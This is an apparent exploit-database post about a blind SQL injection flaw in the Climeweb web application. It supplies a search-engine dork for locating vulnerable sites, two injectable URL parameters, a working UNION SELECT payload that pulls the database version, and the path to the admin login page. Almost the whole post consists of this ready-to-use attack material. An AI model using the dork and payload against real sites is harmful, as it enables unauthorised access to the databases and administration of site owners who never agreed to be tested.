==========================================================================

# Exploit Title: Climeweb Blind SQL Injection Vulnerability
# Date: 11.10.2011
# Author: poach3r
# Software Link: http://www.climeweb.com/
# Tested on: Windows XP SP3
# Google Dork: "Powered by Climeweb" inurl:"indux.php"

==========================================================================

# Exploit :

http://127.0.0.1/path/indux.php?id=[SQL]

http://127.0.0.1/path/newsdetails.php?News_Id=[SQL]

# Demo :

http://127.0.0.1/path/indux.php?id=-2+union+select+1,version(),3,4,5+admin--

# Admin Page :

http://127.0.0.1/path/admin/login.php

==========================================================================

# GreetZ To : All IRANIAN HackerZ

./End